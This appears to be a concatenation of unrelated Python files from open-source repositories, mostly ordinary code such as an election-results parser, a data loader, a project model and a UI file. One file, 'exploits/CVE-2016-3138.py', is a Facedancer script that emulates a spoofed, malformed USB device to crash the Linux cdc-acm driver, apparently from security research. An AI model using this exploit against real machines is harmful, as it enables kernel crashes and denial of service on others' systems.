# repo: UnitedThruAction/Data | path: Tools/SuffolkParser.py | license: apache-2.0
"""Parse Suffolk County data file and emit OpenElections CSV.
@author [email protected]
@date 2017-07-11
"""
import sys
def parse_information_record(line):
"""Type I. Read and parse information record data."""
information = line[5:].rstrip()
return {'information': information}
def parse_office_record(line):
"""Type R. Read and parse office record data."""
office_title = line[5:45].rstrip()
office_title_std = office_title.replace(',', '')
office_district_type = line[45:46].rstrip()
try:
office_district_number = int(line[46:50])
except ValueError:
office_district_number = ''
if office_district_number == 0:
office_district_number = ''
opp_to_ballot = line[50:51]
num_election_districts = int(line[51:55])
count_eligible_voters = int(line[55:62])
try:
num_candidates = int(line[62:64])
except ValueError:
num_candidates = 0
opp_to_ballot_lookup = {'Y': True,
'N': False,
' ': 'Unknown',
'O': 'Unknown',
'0': 'Unknown',
'2': 'Unknown'}
district_type_lookup = {'U': 'United States',
'N': 'New York State',
'K': 'Suffolk County',
'A': 'Unknown',
'L': 'Unknown',
'T': 'Unknown',
'W': 'Unknown',
'S': 'Unknown',
'J': 'Unknown',
'X': 'Unknown',
'C': 'Unknown'}
return {'office_title': office_title,
'office_title_std': office_title_std,
'office_district_type': district_type_lookup[office_district_type],
'office_district_number': office_district_number,
'opp_to_ballot': opp_to_ballot_lookup[opp_to_ballot],
'num_election_districts': num_election_districts,
'count_eligible_voters': count_eligible_voters,
'num_candidates': num_candidates}
def parse_candidate_record(line):
"""Type C. Read and parse candidate record data."""
candidate_name = line[5:30].rstrip().title()
candidate_name_std = candidate_name
if ', ' in candidate_name:
# Re-order 'Smith, Bob' as 'Bob Smith'
names = candidate_name.split(', ')
candidate_name_std = "{} {}".format(names[1], names[0])
party_code = line[30:33].rstrip()
write_in_flag = line[33:34]
write_in_lookup = {'S': True, ' ': 'Unknown'}
total_votes = int(line[34:41])
row_lever_on_ballot = line[41:44].rstrip()
return {'candidate_name': candidate_name,
'candidate_name_std': candidate_name_std,
'party_code': party_code,
'write_in_flag': write_in_lookup[write_in_flag],
'total_votes': total_votes,
'row_lever_on_ballot': row_lever_on_ballot}
def parse_ed_record(line):
"""Type E. Read ED-result record data."""
record_length = int(line[:4])
town_code = line[5:6]
town_code_lookup = {'0': 'Shelter Island',
'1': 'Brookhaven',
'2': 'Huntington',
'3': 'Islip',
'4': 'Babylon',
'5': 'Smithtown',
'6': 'Southampton',
'7': 'East Hampton',
'8': 'Southold',
'9': 'Riverhead'}
ed_number = int(line[6:9])
reported_status = line[9:10].rstrip()
eligible_voters = int(line[10:14])
try:
whole_number = int(line[14:20])
except ValueError:
whole_number = 0
congress_district = int(line[34:35])
senate_district = int(line[35:36])
assembly_district = int(line[36:38])
legislative_district = int(line[38:40])
towncouncil_district = line[40:42].rstrip()
try:
blank_votes = int(line[42:46])
except ValueError:
blank_votes = 0
void_votes = int(line[46:49])
try:
scattering_votes = int(line[49:52])
except ValueError:
scattering_votes = 0
# Handle variable-length candidate fields
    # divmod keeps the count integral and catches a malformed record length
    # under both Python 2 and Python 3
    num_candidates, remainder = divmod(record_length - 52, 4)
    if remainder != 0:
        raise ValueError("Incorrect number of characters on line.")
votes = []
try:
for i in range(int(num_candidates)):
start_index = 52 + (4 * i)
end_index = 56 + (4 * i)
votes.append(int(line[start_index:end_index]))
except TypeError as t:
print("Caught TypeError with num_candidates {}, record_length {}, "
"line '{}'".format(num_candidates, record_length, line))
# Generate Suffolk-specific precinct code
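    # Illustrative (assumed) example: town code '1' with ED number 1 yields
    # "Brookhaven #:  01" given the two-stage formatting below.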
precinct_code = "{} #: {:>3}".format(town_code_lookup[town_code].title(),
"{:02.0f}".format(ed_number))
return {'town_name': town_code_lookup[town_code],
'ed_number': ed_number,
'reported_status': reported_status,
'eligible_voters': eligible_voters,
'whole_number': whole_number,
'congress_district': congress_district,
'senate_district': senate_district,
'assembly_district': assembly_district,
'legislative_district': legislative_district,
'towncouncil_district': towncouncil_district,
'blank_votes': blank_votes,
'void_votes': void_votes,
'scattering_votes': scattering_votes,
'num_candidates': num_candidates,
'votes': votes,
'precinct_code': precinct_code}
def process_file(filename):
"""Read the whole file and emit output in standard OE format."""
out_handle = open("{}-output.csv".format(filename), 'w')
out_handle.write('county,precinct,office,district,party,candidate,votes\n')
candidates = None
office = None
in_handle = open(filename, 'r')
for line in in_handle:
if line[4:5] == 'I':
# Information
print(parse_information_record(line))
if line[4:5] == 'R':
# Office
office = parse_office_record(line)
# Reset candidates
candidates = []
if line[4:5] == 'C':
# Candidate
candidates.append(parse_candidate_record(line))
if line[4:5] == 'E':
# ED Breakdown
election_district = parse_ed_record(line)
for i, vote in enumerate(election_district['votes']):
# County
output = ['Suffolk']
# Precinct
output.append(election_district['precinct_code'])
# Office
output.append(office['office_title_std'])
# District
output.append(str(office['office_district_number']))
# Party
try:
output.append(candidates[i]['party_code'])
except IndexError:
output.append('')
# Candidate
try:
output.append(candidates[i]['candidate_name_std'])
except IndexError:
output.append('')
# Votes
output.append(str(vote))
out_handle.write(",".join(output))
out_handle.write("\n")
# Append ED void/scattering votes
special_types = {'Scattering': 'scattering_votes',
'Void': 'void_votes',
'Blank': 'blank_votes'}
for name in special_types:
if election_district[special_types[name]] > 0:
output = ['Suffolk',
election_district['precinct_code'],
office['office_title_std'],
str(office['office_district_number']),
'',
name,
str(election_district[special_types[name]])]
out_handle.write(",".join(output))
out_handle.write("\n")
in_handle.close()
out_handle.close()
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.exit("Provide filename on command-line.")
else:
process_file(sys.argv[1])

# repo: AhmedHani/Kaggle-Machine-Learning-Competitions | path: Easy/What's Cooking/get_data.py | license: mit
__author__ = 'Ahmed Hani Ibrahim'
import json
import scipy as sc
import numpy as np
def get_train_data():
with open('./train.json') as r:
data = json.load(r)
r.close()
return data
def get_test_data():
with open('./test.json') as r:
data = json.load(r)
r.close()
return data
def encode_data(data):
labels = [item['cuisine'] for item in data]
unique_labels = set(labels)
labels_dictionary = {}
count = 0
for label in unique_labels:
labels_dictionary[label] = count
count += 1
ingredients = [item['ingredients'] for item in data]
unique_ingredients = set(inner_item for outer_item in ingredients for inner_item in outer_item)
ingredients_dictionary = {}
count = 0
for ingredient in unique_ingredients:
ingredients_dictionary[ingredient] = count
count += 1
return labels, labels_dictionary, ingredients, ingredients_dictionary, data
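
# Rough sketch of the return values (inferred from the code above): 'labels' is the
# per-recipe cuisine list, 'labels_dictionary' maps each unique cuisine string to an
# integer index (for example possibly {'greek': 0, 'italian': 1, ...}; the order
# depends on set iteration), and 'ingredients'/'ingredients_dictionary' do the same
# for ingredient strings.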
def vectorize_data(labels, labels_dictionary, ingredients, ingredients_dictionary, data):
labels_list = []
ingredients_list = []
for item in data:
        if u'cuisine' in item:
label = str(item[u'cuisine'])
if label in labels_dictionary:
labels_list.append(labels_dictionary[label])
if u'ingredients' in item:
temp_ingredients = item[u'ingredients']
temp_numerical_ingredients = []
for ingredient in temp_ingredients:
if ingredient in ingredients_dictionary:
index = ingredients_dictionary[ingredient]
temp_numerical_ingredients.append(index)
ingredients_list.append(temp_numerical_ingredients)
print(len(ingredients_list), len(labels_list))
return (np.array(ingredients_list), np.array(labels_list))
#labels, labels_dictionary, ingredients, ingredients_dictionary, data = encode_data(get_train_data())
#features, classes = vectorize_data(labels, labels_dictionary, ingredients, ingredients_dictionary, data)

# repo: qiqi/fds | path: tests/test_autonomous_system/test_vida_automomous_system.py | license: gpl-3.0
import os
import sys
import shutil
import string
import subprocess
from numpy import *
my_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(my_path, '../..'))
from fds.cti_restart_io import *
ref_fname = os.path.join(my_path, '..', 'data', 'cti-sample-restart-file.les')
initial_state = load_les(ref_fname, verbose=True)
base_dir = os.path.join(my_path, 'vida')
def run_vida_in(run_dir, state, steps):
print('Running {0} steps'.format(steps))
os.mkdir(run_dir)
template = open(os.path.join(my_path, 'vida.template')).read()
template = string.Template(template)
fname = os.path.join(run_dir, 'initial.les')
shutil.copy(ref_fname, fname)
state['STEP'] = 1
save_les(fname, state, verbose=True)
with open(os.path.join(run_dir, 'vida.in'), 'w') as f:
f.write(template.substitute(NSTEPS=str(steps+1)))
with open(os.path.join(run_dir, 'vida.out'), 'w') as f:
subprocess.check_call('/home/qiqi/BulletBody-ref/vida.exe',
cwd=run_dir, stdout=f, stderr=f)
fname = os.path.join(run_dir, 'result.les')
return load_les(fname, verbose=True)
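
# Added note (inferred from the block below): the check runs 50 + 50 steps as two
# chained restarts and 100 steps in one go, then compares the two final restart
# files field by field.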
if __name__ == '__main__':
if os.path.exists(base_dir):
shutil.rmtree(base_dir)
os.mkdir(base_dir)
intermediate_state = run_vida_in(os.path.join(base_dir, 'first_50_steps'),
initial_state, 50)
final_state_1 = run_vida_in(os.path.join(base_dir, 'second_50_steps'),
intermediate_state, 50)
final_state_2 = run_vida_in(os.path.join(base_dir, 'all_100_steps_at_once'),
initial_state, 100)
for k in final_state_1:
if k != 'STEP':
if (final_state_1[k] == final_state_2[k]).all():
print(k, ' matches')
else:
print(k, ' does not match')

# repo: sga001/cinch | path: exploits/CVE-2016-3138.py | license: cc0-1.0
#!/usr/bin/env python3
from USB import *
from USBDevice import *
from USBConfiguration import *
from USBInterface import *
from USBEndpoint import *
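
# Added context (best-effort, not from the original source): CVE-2016-3138 is a
# NULL-pointer dereference in the Linux cdc-acm USB driver for devices that expose
# too few endpoint descriptors. The Facedancer-emulated device below advertises the
# Kyocera AH-K3001V vendor/product IDs (0x0482:0x0203) with a single bare interface
# and no endpoints, the kind of malformed device that triggers the bug.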
class PwnUSBDevice(USBDevice):
name = "USB device"
def handle_buffer_available(self, lll):
return
def __init__(self, maxusb_app, verbose=0):
interface = USBInterface(
0, # interface number
0, # alternate setting
255, # interface class
0, # subclass
0, # protocol
0, # string index
verbose,
[],
{}
)
config = USBConfiguration(
1, # index
"Emulated Device", # string desc
[ interface ] # interfaces
)
USBDevice.__init__(
self,
maxusb_app,
0, # device class
0, # device subclass
0, # protocol release number
64, # max packet size for endpoint 0
0x0482, # vendor id
0x0203, # product id
0, # device revision
"Kyocera Corp.", # manufacturer string
"AH-K3001V", # product string
"?", # serial number string
[ config ],
verbose=verbose
)
from Facedancer import *
from MAXUSBApp import *
sp = GoodFETSerialPort()
fd = Facedancer(sp, verbose=1)
u = MAXUSBApp(fd, verbose=1)
d = PwnUSBDevice(u, verbose=4)
d.connect()
try:
d.run()
except KeyboardInterrupt:
d.disconnect()

# repo: nion-software/nionswift | path: nion/swift/model/Project.py | license: gpl-3.0
# standard libraries
import functools
import logging
import pathlib
import typing
import uuid
import weakref
# local libraries
from nion.swift.model import Changes
from nion.swift.model import Connection
from nion.swift.model import DataGroup
from nion.swift.model import Symbolic
from nion.swift.model import DataItem
from nion.swift.model import DataStructure
from nion.swift.model import DisplayItem
from nion.swift.model import FileStorageSystem
from nion.swift.model import Persistence
from nion.swift.model import WorkspaceLayout
from nion.utils import Converter
from nion.utils import ListModel
from nion.utils import Observable
ProjectItemType = typing.Union[DataItem.DataItem, DisplayItem.DisplayItem, DataStructure.DataStructure, Connection.Connection, Symbolic.Computation]
class Project(Observable.Observable, Persistence.PersistentObject):
"""A project manages raw data items, display items, computations, data structures, and connections.
    Projects are stored in project indexes, which are files that describe how to find data and track the other
project relationships (display items, computations, data structures, connections).
Projects manage reading, writing, and data migration.
"""
PROJECT_VERSION = 3
_processing_descriptions = dict()
def __init__(self, storage_system: FileStorageSystem.ProjectStorageSystem):
super().__init__()
self.define_type("project")
self.define_property("title", str())
self.define_relationship("data_items", data_item_factory, insert=self.__data_item_inserted, remove=self.__data_item_removed)
self.define_relationship("display_items", display_item_factory, insert=self.__display_item_inserted, remove=self.__display_item_removed)
self.define_relationship("computations", computation_factory, insert=self.__computation_inserted, remove=self.__computation_removed)
self.define_relationship("data_structures", data_structure_factory, insert=self.__data_structure_inserted, remove=self.__data_structure_removed)
self.define_relationship("connections", Connection.connection_factory, insert=self.__connection_inserted, remove=self.__connection_removed)
self.define_relationship("data_groups", DataGroup.data_group_factory, insert=self.__data_group_inserted, remove=self.__data_group_removed)
self.define_relationship("workspaces", WorkspaceLayout.factory)
self.define_property("workspace_uuid", converter=Converter.UuidToStringConverter())
self.define_property("data_item_references", dict(), hidden=True, changed=self.__property_changed) # map string key to data item, used for data acquisition channels
self.define_property("mapped_items", list(), changed=self.__property_changed) # list of item references, used for shortcut variables in scripts
self.handle_start_read = None
self.handle_insert_model_item = None
self.handle_remove_model_item = None
self.handle_finish_read = None
self.__has_been_read = False
self._raw_properties = None # debugging
self.__storage_system = storage_system
self.set_storage_system(self.__storage_system)
def close(self) -> None:
self.handle_start_read = None
self.handle_insert_model_item = None
self.handle_remove_model_item = None
self.handle_finish_read = None
self.__storage_system.close()
self.__storage_system = None
super().close()
def open(self) -> None:
self.__storage_system.reset() # this makes storage reusable during tests
def create_proxy(self) -> Persistence.PersistentObjectProxy:
return self.container.create_item_proxy(item=self)
@property
def item_specifier(self) -> Persistence.PersistentObjectSpecifier:
return Persistence.PersistentObjectSpecifier(item_uuid=self.uuid)
def create_specifier(self, item: Persistence.PersistentObject) -> Persistence.PersistentObjectSpecifier:
return Persistence.PersistentObjectSpecifier(item=item)
def insert_model_item(self, container, name, before_index, item) -> None:
# special handling to pass on to the document model
assert callable(self.handle_insert_model_item)
self.handle_insert_model_item(container, name, before_index, item)
def remove_model_item(self, container, name, item, *, safe: bool=False) -> Changes.UndeleteLog:
# special handling to pass on to the document model
assert callable(self.handle_remove_model_item)
return self.handle_remove_model_item(container, name, item, safe=safe)
@property
def storage_system_path(self) -> pathlib.Path:
return pathlib.Path(self.__storage_system.get_identifier())
@property
def project_uuid(self) -> typing.Optional[uuid.UUID]:
properties = self.__storage_system.get_storage_properties()
try:
return uuid.UUID(properties.get("uuid", str(uuid.uuid4()))) if properties else None
except Exception:
return None
@property
def project_state(self) -> str:
project_uuid = self.project_uuid
project_version = self.project_version
if project_uuid is not None and project_version is not None:
if project_version == FileStorageSystem.PROJECT_VERSION:
return "loaded" if self.__has_been_read else "unloaded"
else:
return "needs_upgrade"
return "invalid"
@property
def project_version(self) -> typing.Optional[int]:
properties = self.__storage_system.get_storage_properties()
try:
return properties.get("version", None) if properties else None
except Exception:
return None
@property
def project_filter(self) -> ListModel.Filter:
def is_display_item_active(project_weak_ref, display_item: DisplayItem.DisplayItem) -> bool:
return display_item.project == project_weak_ref()
# use a weak reference to avoid circular references loops that prevent garbage collection
return ListModel.PredicateFilter(functools.partial(is_display_item_active, weakref.ref(self)))
@property
def project_storage_system(self) -> FileStorageSystem.ProjectStorageSystem:
return self.__storage_system
def __data_item_inserted(self, name: str, before_index: int, data_item: DataItem.DataItem) -> None:
self.notify_insert_item("data_items", data_item, before_index)
def __data_item_removed(self, name: str, index: int, data_item: DataItem.DataItem) -> None:
self.notify_remove_item("data_items", data_item, index)
def __display_item_inserted(self, name: str, before_index: int, display_item: DisplayItem.DisplayItem) -> None:
self.notify_insert_item("display_items", display_item, before_index)
def __display_item_removed(self, name: str, index: int, display_item: DisplayItem.DisplayItem) -> None:
self.notify_remove_item("display_items", display_item, index)
def __data_structure_inserted(self, name: str, before_index: int, data_structure: DataStructure.DataStructure) -> None:
self.notify_insert_item("data_structures", data_structure, before_index)
def __data_structure_removed(self, name: str, index: int, data_structure: DataStructure.DataStructure) -> None:
self.notify_remove_item("data_structures", data_structure, index)
def __computation_inserted(self, name: str, before_index: int, computation: Symbolic.Computation) -> None:
self.notify_insert_item("computations", computation, before_index)
def __computation_removed(self, name: str, index: int, computation: Symbolic.Computation) -> None:
self.notify_remove_item("computations", computation, index)
def __connection_inserted(self, name: str, before_index: int, connection: Connection.Connection) -> None:
self.notify_insert_item("connections", connection, before_index)
def __connection_removed(self, name: str, index: int, connection: Connection.Connection) -> None:
self.notify_remove_item("connections", connection, index)
def __data_group_inserted(self, name: str, before_index: int, data_group: DataGroup.DataGroup) -> None:
self.notify_insert_item("data_groups", data_group, before_index)
def __data_group_removed(self, name: str, index: int, data_group: DataGroup.DataGroup) -> None:
self.notify_remove_item("data_groups", data_group, index)
def _get_relationship_persistent_dict(self, item, key: str, index: int) -> typing.Dict:
if key == "data_items":
return self.__storage_system.get_persistent_dict("data_items", item.uuid)
else:
return super()._get_relationship_persistent_dict(item, key, index)
def _get_relationship_persistent_dict_by_uuid(self, item, key: str) -> typing.Optional[typing.Dict]:
if key == "data_items":
return self.__storage_system.get_persistent_dict("data_items", item.uuid)
else:
return super()._get_relationship_persistent_dict_by_uuid(item, key)
def prepare_read_project(self) -> None:
logging.getLogger("loader").info(f"Loading project {self.__storage_system.get_identifier()}")
self._raw_properties = self.__storage_system.read_project_properties() # combines library and data item properties
self.uuid = uuid.UUID(self._raw_properties.get("uuid", str(uuid.uuid4())))
def read_project(self) -> None:
if callable(self.handle_start_read):
self.handle_start_read()
properties = self._raw_properties
if properties:
project_version = properties.get("version", None)
if project_version is not None and project_version == FileStorageSystem.PROJECT_VERSION:
for item_d in properties.get("data_items", list()):
data_item = DataItem.DataItem()
data_item.begin_reading()
data_item.read_from_dict(item_d)
data_item.finish_reading()
if not self.get_item_by_uuid("data_items", data_item.uuid):
self.load_item("data_items", len(self.data_items), data_item)
else:
data_item.close()
for item_d in properties.get("display_items", list()):
display_item = DisplayItem.DisplayItem()
display_item.begin_reading()
display_item.read_from_dict(item_d)
display_item.finish_reading()
if not self.get_item_by_uuid("display_items", display_item.uuid):
self.load_item("display_items", len(self.display_items), display_item)
else:
display_item.close()
for item_d in properties.get("data_structures", list()):
data_structure = DataStructure.DataStructure()
data_structure.begin_reading()
data_structure.read_from_dict(item_d)
data_structure.finish_reading()
if not self.get_item_by_uuid("data_structures", data_structure.uuid):
self.load_item("data_structures", len(self.data_structures), data_structure)
else:
data_structure.close()
for item_d in properties.get("computations", list()):
computation = Symbolic.Computation()
computation.begin_reading()
computation.read_from_dict(item_d)
computation.finish_reading()
if not self.get_item_by_uuid("computations", computation.uuid):
self.load_item("computations", len(self.computations), computation)
# TODO: handle update script and bind after reload in document model
computation.update_script(Project._processing_descriptions)
computation.reset()
else:
computation.close()
for item_d in properties.get("connections", list()):
connection = Connection.connection_factory(item_d.get)
connection.begin_reading()
connection.read_from_dict(item_d)
connection.finish_reading()
if not self.get_item_by_uuid("connections", connection.uuid):
self.load_item("connections", len(self.connections), connection)
else:
connection.close()
for item_d in properties.get("data_groups", list()):
data_group = DataGroup.data_group_factory(item_d.get)
data_group.begin_reading()
data_group.read_from_dict(item_d)
data_group.finish_reading()
if not self.get_item_by_uuid("data_groups", data_group.uuid):
self.load_item("data_groups", len(self.data_groups), data_group)
else:
data_group.close()
for item_d in properties.get("workspaces", list()):
workspace = WorkspaceLayout.factory(item_d.get)
workspace.begin_reading()
workspace.read_from_dict(item_d)
workspace.finish_reading()
if not self.get_item_by_uuid("workspaces", workspace.uuid):
self.load_item("workspaces", len(self.workspaces), workspace)
else:
workspace.close()
workspace_uuid_str = properties.get("workspace_uuid", None)
if workspace_uuid_str:
self._set_persistent_property_value("workspace_uuid", uuid.UUID(workspace_uuid_str))
self._set_persistent_property_value("data_item_references", properties.get("data_item_references", dict()))
self._set_persistent_property_value("mapped_items", properties.get("mapped_items", list()))
self.__has_been_read = True
if callable(self.handle_finish_read):
self.handle_finish_read()
def __property_changed(self, name, value):
self.notify_property_changed(name)
def append_data_item(self, data_item: DataItem.DataItem) -> None:
assert not self.get_item_by_uuid("data_items", data_item.uuid)
self.append_item("data_items", data_item)
data_item.write_data_if_not_delayed() # initially write to disk
def remove_data_item(self, data_item: DataItem.DataItem) -> None:
self.remove_item("data_items", data_item)
def restore_data_item(self, data_item_uuid: uuid.UUID) -> typing.Optional[DataItem.DataItem]:
item_d = self.__storage_system.restore_item(data_item_uuid)
if item_d is not None:
data_item_uuid = uuid.UUID(item_d.get("uuid"))
large_format = item_d.get("__large_format", False)
data_item = DataItem.DataItem(item_uuid=data_item_uuid, large_format=large_format)
data_item.begin_reading()
data_item.read_from_dict(item_d)
data_item.finish_reading()
assert not self.get_item_by_uuid("data_items", data_item.uuid)
self.append_item("data_items", data_item)
assert data_item.container == self
return data_item
return None
def append_display_item(self, display_item: DisplayItem.DisplayItem) -> None:
assert not self.get_item_by_uuid("display_items", display_item.uuid)
self.append_item("display_items", display_item)
def remove_display_item(self, display_item: DisplayItem.DisplayItem) -> None:
self.remove_item("display_items", display_item)
def append_data_structure(self, data_structure: DataStructure.DataStructure) -> None:
assert not self.get_item_by_uuid("data_structures", data_structure.uuid)
self.append_item("data_structures", data_structure)
def remove_data_structure(self, data_structure: DataStructure.DataStructure) -> None:
self.remove_item("data_structures", data_structure)
def append_computation(self, computation: Symbolic.Computation) -> None:
assert not self.get_item_by_uuid("computations", computation.uuid)
self.append_item("computations", computation)
def remove_computation(self, computation: Symbolic.Computation) -> None:
self.remove_item("computations", computation)
def append_connection(self, connection: Connection.Connection) -> None:
assert not self.get_item_by_uuid("connections", connection.uuid)
self.append_item("connections", connection)
def remove_connection(self, connection: Connection.Connection) -> None:
self.remove_item("connections", connection)
@property
def data_item_references(self) -> typing.Dict[str, uuid.UUID]:
return dict(self._get_persistent_property_value("data_item_references").items())
def set_data_item_reference(self, key: str, data_item: DataItem.DataItem) -> None:
data_item_references = self.data_item_references
data_item_references[key] = data_item.item_specifier.write()
self._set_persistent_property_value("data_item_references", {k: v for k, v in data_item_references.items()})
def clear_data_item_reference(self, key: str) -> None:
data_item_references = self.data_item_references
del data_item_references[key]
self._set_persistent_property_value("data_item_references", {k: v for k, v in data_item_references.items()})
@property
def mapped_items(self) -> typing.List[typing.Union[typing.Mapping, str]]:
return list(self._get_persistent_property_value("mapped_items"))
@mapped_items.setter
def mapped_items(self, value: typing.List[typing.Union[typing.Mapping, str]]) -> None:
self._set_persistent_property_value("mapped_items", value)
def prune(self) -> None:
self.__storage_system.prune()
def migrate_to_latest(self) -> None:
self.__storage_system.migrate_to_latest()
self.__storage_system.load_properties()
self.update_storage_system() # reload the properties
self.prepare_read_project()
self.read_project()
def unmount(self) -> None:
while len(self.data_groups) > 0:
self.unload_item("data_groups", len(self.data_groups) - 1)
while len(self.connections) > 0:
self.unload_item("connections", len(self.connections) - 1)
while len(self.computations) > 0:
self.unload_item("computations", len(self.computations) - 1)
while len(self.data_structures) > 0:
self.unload_item("data_structures", len(self.data_structures) - 1)
while len(self.display_items) > 0:
self.unload_item("display_items", len(self.display_items) - 1)
while len(self.data_items) > 0:
self.unload_item("data_items", len(self.data_items) - 1)
def data_item_factory(lookup_id):
data_item_uuid = uuid.UUID(lookup_id("uuid"))
large_format = lookup_id("__large_format", False)
return DataItem.DataItem(item_uuid=data_item_uuid, large_format=large_format)
def display_item_factory(lookup_id):
display_item_uuid = uuid.UUID(lookup_id("uuid"))
return DisplayItem.DisplayItem(item_uuid=display_item_uuid)
def computation_factory(lookup_id):
return Symbolic.Computation()
def data_structure_factory(lookup_id):
return DataStructure.DataStructure()

# repo: richrd/bx | path: modules/autochanmode.py | license: apache-2.0
from mod_base import *
class AutoChanMode(Listener):
"""Automatically manage channel modes according to config."""
def init(self):
self.events = [
IRC_EVT_CHAN_USER_MODE_CHANGE,
IRC_EVT_CHAN_MODE_CHANGE,
]
self.all_modes = "cCDilmMnNoprstTuv"
def RepairModes(self, event):
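        """Unset any channel mode not allowed by the config, then apply the configured modes (summary inferred from the code below)."""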
if event.id == IRC_EVT_CHAN_MODE_CHANGE and event.user == self.bot.me:
return False
valid = self.bot.config.GetChannelModes(event.win)
if valid == None:
return False
del_modes = self.all_modes
for mode in valid:
del_modes = del_modes.replace(mode, "")
event.win.SetModes("-" + del_modes)
event.win.SetModes(valid)
def event(self, event):
m = self.bot.config.GetChannelModes(event.win)
if m == None:
return False
if event.id == IRC_EVT_CHAN_MODE_CHANGE:
if self.bot.me.HasOP(event.win):
self.RepairModes(event)
if event.id == IRC_EVT_CHAN_USER_MODE_CHANGE:
if event.user == self.bot.me:
if self.bot.me.HasOP(event.win):
self.RepairModes(event)
module = {
"class": AutoChanMode,
"type": MOD_LISTENER,

# repo: vertelab/odoo-payroll | path: hr_weekly_working_hours/__openerp__.py | license: gpl-3.0
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution, third party addon
# Copyright (C) 2016- Vertel AB (<http://vertel.se>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Weekly Working Hours',
'version': '0.1',
'summary': 'Adds Weekly working hours fields to hr.contract.',
'category': 'hr',
'description': """""",
'author': 'Vertel AB',
'license': 'AGPL-3',
'website': 'http://www.vertel.se',
'depends': ['hr_contract'],
'data': ['hr_view.xml'],
'installable': True,
}

# repo: mompiou/stereo-proj | path: schmidUI.py | license: gpl-2.0
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'schmidUI.ui'
#
# Created by: PyQt4 UI code generator 4.12.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Schmid(object):
def setupUi(self, Schmid):
Schmid.setObjectName(_fromUtf8("Schmid"))
Schmid.resize(343, 320)
self.layoutWidget = QtGui.QWidget(Schmid)
self.layoutWidget.setGeometry(QtCore.QRect(10, 10, 318, 298))
self.layoutWidget.setObjectName(_fromUtf8("layoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.layoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.schmid_text = QtGui.QTextEdit(self.layoutWidget)
self.schmid_text.setObjectName(_fromUtf8("schmid_text"))
self.gridLayout.addWidget(self.schmid_text, 6, 0, 1, 3)
self.b_label = QtGui.QLabel(self.layoutWidget)
self.b_label.setObjectName(_fromUtf8("b_label"))
self.gridLayout.addWidget(self.b_label, 0, 0, 1, 1)
self.buttonBox = QtGui.QDialogButtonBox(self.layoutWidget)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
self.gridLayout.addWidget(self.buttonBox, 7, 0, 1, 2)
self.T_label = QtGui.QLabel(self.layoutWidget)
self.T_label.setObjectName(_fromUtf8("T_label"))
self.gridLayout.addWidget(self.T_label, 3, 0, 1, 1)
self.b_entry = QtGui.QLineEdit(self.layoutWidget)
self.b_entry.setObjectName(_fromUtf8("b_entry"))
self.gridLayout.addWidget(self.b_entry, 0, 1, 1, 1)
self.T_entry = QtGui.QLineEdit(self.layoutWidget)
self.T_entry.setObjectName(_fromUtf8("T_entry"))
self.gridLayout.addWidget(self.T_entry, 3, 1, 1, 1)
self.n_entry = QtGui.QLineEdit(self.layoutWidget)
self.n_entry.setObjectName(_fromUtf8("n_entry"))
self.gridLayout.addWidget(self.n_entry, 2, 1, 1, 1)
self.n_label = QtGui.QLabel(self.layoutWidget)
self.n_label.setObjectName(_fromUtf8("n_label"))
self.gridLayout.addWidget(self.n_label, 2, 0, 1, 1)
self.schmid_factor_label = QtGui.QLabel(self.layoutWidget)
self.schmid_factor_label.setText(_fromUtf8(""))
self.schmid_factor_label.setObjectName(_fromUtf8("schmid_factor_label"))
self.gridLayout.addWidget(self.schmid_factor_label, 4, 1, 1, 1)
self.retranslateUi(Schmid)
QtCore.QMetaObject.connectSlotsByName(Schmid)
Schmid.setTabOrder(self.b_entry, self.n_entry)
Schmid.setTabOrder(self.n_entry, self.T_entry)
Schmid.setTabOrder(self.T_entry, self.schmid_text)
Schmid.setTabOrder(self.schmid_text, self.buttonBox)
def retranslateUi(self, Schmid):
Schmid.setWindowTitle(_translate("Schmid", "Schmid Factor", None))
self.b_label.setText(_translate("Schmid", "b", None))
self.T_label.setText(_translate("Schmid", "T", None))
self.n_label.setText(_translate("Schmid", "n", None))

# repo: elifesciences/builder | path: src/tests/test_buildercore_utils.py | license: mit
from . import base
from functools import partial
from buildercore import utils
from mock import patch, MagicMock
import logging
LOG = logging.getLogger(__name__)
class Simple(base.BaseCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_ordered_dump(self):
case_list = [
("1", "'1'\n"),
({}, "{}\n"),
# simple bytestrings are treated as regular strings
(b"1", "'1'\n"),
]
self.assertAllPairsEqual(utils.ordered_dump, case_list)
def test_shallow_flatten(self):
case_list = [
([], []),
([[1], [2], [3]], [1, 2, 3]),
([[[1]], [2], [3]], [[1], 2, 3]),
([[None]], [None]),
]
for given, expected in case_list:
self.assertEqual(utils.shallow_flatten(given), expected)
def test_isint(self):
expected_true = [
1, 0, -1,
"1", "0", "-1"
]
self.assertAllTrue(utils.isint, expected_true)
def test_isstr(self):
expected_true = [''] if utils.gtpy2() else ['', r'', u'']
self.assertAllTrue(utils.isstr, expected_true)
def test_nth(self):
expected_vals = [
('a', 0, 'a'),
('ab', 0, 'a'),
('ab', 1, 'b'),
('abc', 2, 'c'),
([1, 2, 3], 0, 1),
([1, 2, 3], 1, 2),
]
for data, n, expected in expected_vals:
self.assertEqual(expected, utils.nth(data, n))
def test_wonky_nths(self):
vals = [
('a', 1),
